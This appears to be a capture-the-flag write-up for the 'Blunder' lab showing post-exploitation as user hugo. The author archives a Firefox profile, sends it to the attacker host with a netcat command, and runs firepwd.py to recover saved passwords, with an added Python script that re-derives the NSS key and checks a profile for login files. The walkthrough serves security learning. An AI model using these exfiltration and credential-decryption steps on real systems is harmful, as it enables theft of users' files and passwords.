Firefox
hugo@blunder:~$ ll
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 ./
drwxr-xr-x 4 root root 4096 Apr 27 2020 ../
lrwxrwxrwx 1 root root 9 Apr 28 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hugo hugo 220 Nov 28 2019 .bash_logout
-rw-r--r-- 1 hugo hugo 3771 Nov 28 2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 2020 .cache/
drwx------ 11 hugo hugo 4096 Nov 28 2019 .config/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Desktop/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Documents/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Downloads/
drwx------ 3 hugo hugo 4096 Apr 27 2020 .gnupg/
drwxrwxr-x 3 hugo hugo 4096 Nov 28 2019 .local/
drwx------ 5 hugo hugo 4096 Apr 27 2020 .mozilla/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Music/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Pictures/
-rw-r--r-- 1 hugo hugo 807 Nov 28 2019 .profile
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Public/
drwx------ 2 hugo hugo 4096 Apr 27 2020 .ssh/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Templates/
-r-------- 1 hugo hugo 33 sep 18 05:34 user.txt
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Videos/
After moving laterally to hugo, I noticed a .mozilla directory in the home directory, which means this user has a Firefox profile and possibly credentials saved in the browser.
hugo@blunder:~$ ll .mozilla/
total 20
drwx------ 5 hugo hugo 4096 Apr 27 2020 ./
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 ../
drwx------ 2 hugo hugo 4096 Apr 27 2020 extensions/
drwx------ 6 hugo hugo 4096 Apr 27 2020 firefox/
drwx------ 2 hugo hugo 4096 Apr 27 2020 systemextensionsdev/
hugo@blunder:~$ ll .mozilla/firefox
total 32
drwx------ 6 hugo hugo 4096 Apr 27 2020 ./
drwx------ 5 hugo hugo 4096 Apr 27 2020 ../
drwx------ 2 hugo hugo 4096 Apr 27 2020 1z12g2ez.default/
drwx------ 12 hugo hugo 4096 Jul 5 2021 2wqko0wa.default-release/
drwx------ 3 hugo hugo 4096 May 19 2020 'Crash Reports'/
-rw-r--r-- 1 hugo hugo 62 Apr 27 2020 installs.ini
drwx------ 2 hugo hugo 4096 Apr 27 2020 'Pending Pings'/
-rw-r--r-- 1 hugo hugo 259 Apr 27 2020 profiles.ini
hugo@blunder:~$ ll .mozilla/firefox/2wqko0wa.default-release/
total 7840
drwx------ 12 hugo hugo 4096 Jul 5 2021 ./
drwx------ 6 hugo hugo 4096 Apr 27 2020 ../
-rw------- 1 hugo hugo 1989 Jul 5 2021 addons.json
-rw------- 1 hugo hugo 2879 Jul 5 2021 addonStartup.json.lz4
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 AlternateServices.txt
drwx------ 2 hugo hugo 4096 May 19 2020 bookmarkbackups/
-rw------- 1 hugo hugo 216 Jul 5 2021 broadcast-listeners.json
-rw------- 1 hugo hugo 229376 Jul 5 2021 cert9.db
-rw------- 1 hugo hugo 162 May 19 2020 compatibility.ini
-rw------- 1 hugo hugo 939 Apr 27 2020 containers.json
-rw-r--r-- 1 hugo hugo 229376 Apr 27 2020 content-prefs.sqlite
-rw-r--r-- 1 hugo hugo 524288 Jul 5 2021 cookies.sqlite
drwx------ 3 hugo hugo 4096 Jul 5 2021 crashes/
drwx------ 3 hugo hugo 4096 Jul 5 2021 datareporting/
-rw------- 1 hugo hugo 1206 Apr 27 2020 extension-preferences.json
drwx------ 2 hugo hugo 4096 Apr 27 2020 extensions/
-rw------- 1 hugo hugo 48044 Jul 5 2021 extensions.json
-rw-r--r-- 1 hugo hugo 5242880 Jul 5 2021 favicons.sqlite
-rw-r--r-- 1 hugo hugo 196608 Jul 5 2021 formhistory.sqlite
drwxr-xr-x 3 hugo hugo 4096 Apr 27 2020 gmp-gmpopenh264/
-rw------- 1 hugo hugo 545 Apr 27 2020 handlers.json
-rw------- 1 hugo hugo 294912 Apr 27 2020 key4.db
drwx------ 2 hugo hugo 4096 Apr 27 2020 minidumps/
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 .parentlock
-rw-r--r-- 1 hugo hugo 98304 Jul 5 2021 permissions.sqlite
-rw------- 1 hugo hugo 476 Apr 27 2020 pkcs11.txt
-rw-r--r-- 1 hugo hugo 5242880 Jul 5 2021 places.sqlite
-rw------- 1 hugo hugo 9878 Jul 5 2021 prefs.js
-rw-r--r-- 1 hugo hugo 65536 Jul 5 2021 protections.sqlite
drwx------ 2 hugo hugo 4096 Jul 5 2021 saved-telemetry-pings/
-rw------- 1 hugo hugo 9981 Jul 5 2021 search.json.mozlz4
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 SecurityPreloadState.txt
drwxr-xr-x 2 hugo hugo 4096 Apr 27 2020 security_state/
-rw-r--r-- 1 hugo hugo 161 May 19 2020 serviceworker.txt
-rw------- 1 hugo hugo 288 Jul 5 2021 sessionCheckpoints.json
drwx------ 2 hugo hugo 4096 Jul 5 2021 sessionstore-backups/
-rw------- 1 hugo hugo 4648 Jul 5 2021 sessionstore.jsonlz4
-rw------- 1 hugo hugo 18 Apr 27 2020 shield-preference-experiments.json
-rw------- 1 hugo hugo 84 Apr 29 2020 shield-recipe-client.json
-rw-r--r-- 1 hugo hugo 2560 Jul 5 2021 SiteSecurityServiceState.txt
drwxr-xr-x 5 hugo hugo 4096 Apr 27 2020 storage/
-rw-r--r-- 1 hugo hugo 4096 Jul 5 2021 storage.sqlite
-rw------- 1 hugo hugo 50 Apr 27 2020 times.json
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 TRRBlacklist.txt
-rw-r--r-- 1 hugo hugo 163840 Jul 5 2021 webappsstore.sqlite
-rw------- 1 hugo hugo 140 Jul 5 2021 xulstore.json
The user has a Firefox profile, 2wqko0wa.default-release. Firefox keeps saved logins encrypted in logins.json (signons.sqlite in old versions) and the key that protects them in key4.db, so if hugo has ever saved a password in this browser I should be able to extract it. I archived the whole profile and pulled it back to my machine with netcat (listener started first on Kali):
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/hugo]
└─$ nc -lvnp 2222 > firefox.tar.gz
listening on [any] 2222 ...
hugo@blunder:~$ tar -czf firefox.tar.gz .mozilla/firefox/2wqko0wa.default-release/
hugo@blunder:~$ nc 10.10.14.17 2222 < firefox.tar.gz
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 55892
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/hugo]
└─$ tar -xf firefox.tar.gz
With the transfer complete and the archive extracted, I ran firepwd.py against the profile directory.
firepwd.py
┌──(kali㉿kali)-[~/…/htb/labs/blunder/firepwd]
└─$ python3 firepwd.py -d hugo/.mozilla/firefox/2wqko0wa.default-release
globalSalt: b'86f17cfde971ec91d6b1da3f94e25528349b1f85'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'ec0ad08e0cd81a78fa1608b6021f56fc16d5df15e627eaed832d2eff86850f1f'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'8a571cec61089ebbe814b8d29091'
}
}
}
OCTETSTRING b'6566b0ae4c61b75da02849b16578b612'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
no saved login/password
firepwd.py did decrypt the string correctly: 70617373776f72642d636865636b0202 is the hex of password-check followed by two bytes of PKCS#7 padding (0x02 0x02), which is exactly the marker NSS stores in key4.db so that a master password can be validated. "password check? True" therefore means the profile has no master password (firepwd.py tries the empty one by default) and the derived key is right. The reason nothing came out is the last line, "no saved login/password": the encrypted usernames and passwords live in logins.json, and the profile listing above has key4.db and cert9.db but no logins.json, so hugo never saved any credentials in this browser. The Firefox profile is a dead end.
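To make the two firepwd.py results concrete, here is an added Python example (not firepwd.py's own code and not part of the original write-up). It re-derives the AES key and IV for the key4.db password-check entry from the parameters firepwd.py dumped above (SHA1(globalSalt || masterPassword) fed to PBKDF2-HMAC-SHA256, IV prefixed with the DER bytes 04 0e, AES-256-CBC), verifies the decrypted marker the way firepwd.py does, and then triages a profile directory for the files the tool actually needs. The hex values are the ones printed above; the two temporary profile directories are constructed samples. Key derivation uses only the standard library; the AES step runs if pycryptodome or cryptography is installed and otherwise falls back to the cleartext firepwd.py printed.

```python
"""Why firepwd.py said "password check? True" but "no saved login/password".

Added example for this write-up (not firepwd.py's own code). The hex values
are the ones firepwd.py printed; the temporary profile directories are
constructed samples.
"""
import hashlib
import json
import os
import tempfile
from binascii import unhexlify

# Parameters of the key4.db "password-check" entry, as dumped by firepwd.py.
GLOBAL_SALT = unhexlify("86f17cfde971ec91d6b1da3f94e25528349b1f85")
ENTRY_SALT = unhexlify("ec0ad08e0cd81a78fa1608b6021f56fc16d5df15e627eaed832d2eff86850f1f")
ITERATIONS = 0x01        # INTEGER b'01'
KEY_LENGTH = 0x20        # INTEGER b'20' -> 32 bytes, i.e. AES-256
IV_TAIL = unhexlify("8a571cec61089ebbe814b8d29091")       # 14 bytes in the aes256-CBC SEQUENCE
CIPHERTEXT = unhexlify("6566b0ae4c61b75da02849b16578b612")
PRINTED_CLEARTEXT = unhexlify("70617373776f72642d636865636b0202")


def nss_pbes2_key_iv(master_password=b""):
    """Derive the AES key and IV for a key4.db PBES2 entry.

    NSS does not feed the master password to PBKDF2 directly: it first hashes
    SHA1(globalSalt || masterPassword) and uses that digest as the PBKDF2
    password, with the entry's own salt and iteration count. The IV in the
    blob is 14 bytes; NSS prepends the DER bytes 04 0e to make 16.
    An empty master_password is what firepwd.py tries by default.
    """
    hashed_pw = hashlib.sha1(GLOBAL_SALT + master_password).digest()
    key = hashlib.pbkdf2_hmac("sha256", hashed_pw, ENTRY_SALT, ITERATIONS, dklen=KEY_LENGTH)
    return key, b"\x04\x0e" + IV_TAIL


def aes_cbc_decrypt(key, iv, data):
    """Raw AES-CBC decrypt (no unpadding). Returns None if no AES library is installed."""
    try:
        from Crypto.Cipher import AES            # pycryptodome, which firepwd.py itself uses
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        pass
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        return None


def strip_pkcs7(data):
    """Remove PKCS#7 padding, rejecting malformed padding instead of guessing."""
    n = data[-1]
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding")
    return data[:-n]


def password_check(master_password=b""):
    """Return (ok, cleartext) judged exactly as firepwd.py does: the entry must
    decrypt to b'password-check' plus two padding bytes. ok=True means the
    master password (here: none) is correct, not that any login exists."""
    key, iv = nss_pbes2_key_iv(master_password)
    clear = aes_cbc_decrypt(key, iv, CIPHERTEXT)
    if clear is None:                            # no AES backend available
        if master_password:
            raise RuntimeError("an AES library is needed to test a non-empty master password")
        clear = PRINTED_CLEARTEXT                # value firepwd.py printed for the empty password
    ok = clear == b"password-check\x02\x02"
    return ok, (strip_pkcs7(clear) if ok else clear)


def triage_profile(profile_dir):
    """What firepwd.py needs: a key database (key4.db/key3.db) for the master
    key AND a login store (logins.json, or signons.sqlite in old Firefox)
    holding the encrypted usernames/passwords. key4.db alone yields nothing."""
    names = set(os.listdir(profile_dir))
    report = {
        "key_db": bool(names & {"key4.db", "key3.db"}),
        "login_store": bool(names & {"logins.json", "signons.sqlite"}),
        "saved_logins": 0,
    }
    if "logins.json" in names:
        with open(os.path.join(profile_dir, "logins.json")) as fh:
            report["saved_logins"] = len(json.load(fh).get("logins", []))
    return report


def demo_profiles():
    """Two constructed profiles: hugo's file set (key4.db, no logins.json) and
    one with a single saved login. Returns both triage reports."""
    hugo = tempfile.mkdtemp(prefix="hugo-")
    for name in ("key4.db", "cert9.db", "pkcs11.txt", "places.sqlite", "cookies.sqlite"):
        open(os.path.join(hugo, name), "wb").close()
    other = tempfile.mkdtemp(prefix="other-")
    open(os.path.join(other, "key4.db"), "wb").close()
    with open(os.path.join(other, "logins.json"), "w") as fh:
        # Field names as Firefox writes them; the blob contents are placeholders.
        json.dump({"logins": [{"hostname": "https://example.invalid",
                               "encryptedUsername": "placeholder",
                               "encryptedPassword": "placeholder"}]}, fh)
    return triage_profile(hugo), triage_profile(other)


if __name__ == "__main__":
    print("password check?", password_check())
    hugo_like, with_login = demo_profiles()
    print("hugo-like profile:", hugo_like)
    print("profile with a saved login:", with_login)
```

Running it against a real profile is just `triage_profile("hugo/.mozilla/firefox/2wqko0wa.default-release")`: a report with key_db True and login_store False is the same situation firepwd.py hit here, and it is worth checking before bothering with the transfer at all, since logins.json is a small plain file whose presence you can see in the directory listing on the target.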